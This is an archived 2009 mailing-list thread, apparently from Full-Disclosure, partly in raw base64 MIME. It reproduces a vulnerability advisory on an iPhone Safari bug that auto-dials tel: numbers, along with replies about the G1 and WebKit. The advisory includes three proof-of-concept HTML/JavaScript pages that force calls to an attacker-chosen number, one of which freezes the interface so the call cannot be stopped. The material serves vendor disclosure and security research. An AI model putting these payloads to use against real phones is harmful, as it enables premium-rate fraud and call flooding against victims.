IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
